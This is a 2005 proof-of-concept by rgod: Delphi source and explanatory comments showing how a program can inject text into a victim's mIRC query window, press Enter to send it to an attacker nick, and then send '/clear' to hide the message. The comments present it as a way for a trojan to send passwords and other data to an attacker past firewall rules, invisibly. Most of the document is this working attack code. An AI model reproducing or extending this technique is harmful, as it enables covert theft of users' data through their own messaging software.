//Mirc 6.16 and "generic Edit component" Win32 trick
//
//by rgod _ May 2, 2005
// 
//http://rgod.altervista.org
//
//Naturally you know that you can capture Edit box text
//by sending WM_GETTEXT message to it and set text
//by WM_SETTEXT message. Naturally you know you can simulate
//the pressure of a key.
//And what happens when you use Mirc or other messaging software?
//
//In order to test the program, put a Timer in the form,
//compile with Delphi,  you have to open two sessions of mirc,
//you authenticate yourselves in a session and you open a
//query in the other. Now, start the project executable.
//In the victim session move on titlebar, where the alter-ego
// nick is visualized and you enjoy the show...  
//Here it is how a Trojan can take advantage of mirc and other 
//messaging software in order to send to the attacker
//passwords and other stuff, bypassing firewall rules.
//It can be all invisibile, naturally
//here the code in Object Pascal...

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    Timer1: TTimer;
  procedure Timer1Timer(Sender: TObject);
    { Private declarations }
  public
    { Public declarations }
  end;
var
  Form1: TForm1;

implementation

{$R *.dfm}

//function that simulate the pressure of a key...
procedure PostKey(key: Word; const shift: TShiftState; specialkey: Boolean);
type
  TShiftKeyInfo = record
    shift: Byte;
    vkey: Byte;
  end;
  byteset = set of 0..7;
const
  shiftkeys: array [1..3] of TShiftKeyInfo =
    ((shift: Ord(ssCtrl); vkey: VK_CONTROL),
    (shift: Ord(ssShift); vkey: VK_SHIFT),
    (shift: Ord(ssAlt); vkey: VK_MENU));
var
  flag: DWORD;
  bShift: ByteSet absolute shift;
  i: Integer;
begin
  for i := 1 to 3 do
  begin
    if shiftkeys[i].shift in bShift then
      keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, 0), 0, 0);
  end; { For }
  if specialkey then
    flag := KEYEVENTF_EXTENDEDKEY
  else
    flag := 0;

  keybd_event(key, MapvirtualKey(key, 0), flag, 0);
  flag := flag or KEYEVENTF_KEYUP;
  keybd_event(key, MapvirtualKey(key, 0), flag, 0);

  for i := 3 downto 1 do
  begin
    if shiftkeys[i].shift in bShift then
      keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, 0),
        KEYEVENTF_KEYUP, 0);
  end;
end;

//function that find the handle of a controll supplying the handle of the mother window
function FindControl(hApp: HWND; ControlClassName: string; ControlNr: Word = 1):
HWND;
var
  i: Word;
  hControl: HWND;
begin
  Result := 0;
  if IsWindow(hApp) then
  begin
    Dec(ControlNr);
    hControl := 0;
    for i := 0 to ControlNr do
    begin
      hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), nil);
      if hControl = 0 then
        Exit;
    end;
  end;
  Result := hControl;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
  hWnd: THandle;
  hedit: THandle;
  aName: array [0..255] of Char;
  mytext:array [0..10000] of char;
  query: pchar;
  rPos: TPoint;
begin

  if Boolean(GetCursorPos(rPos)) then
  begin
  hwnd:=WindowFromPoint(rPos);
  sendmessage(hwnd,wm_gettext,10001,integer(@mytext));
  if Boolean(GetClassName(hWnd, aName, 256)) then


  if strpos(aName,'mIRC_Query') <> nil then //mdiChild classname in Mirc

  if strpos(mytext,'rgod') <> nil then     //attacker nick, it is visualized
                                           //in mDIChild titlebar
                                           //while victim is talking to you
                                           
  begin //now it will send the message...
    hedit:=findcontrol(hWnd,'Edit',1);

    query:='hello';  //only 'hello' for this time if before 
                     //one has not bring passwords

    sendmessage(hedit,wm_settext,0,integer(query)); //paste text
                                                    //in the edit box
    PostKey(13, [], False); //simulate the pressure of Enter
    query:='/clear';
    sendmessage(hedit,wm_settext,0,integer(query)); //paste /clear in the edit
                                                    //box to clear the window, nothing has been
                                                    //done if you ask to the victim :)
    PostKey(13, [], False); //simulate the pressure of Enter
  end;
  end;
end;

end.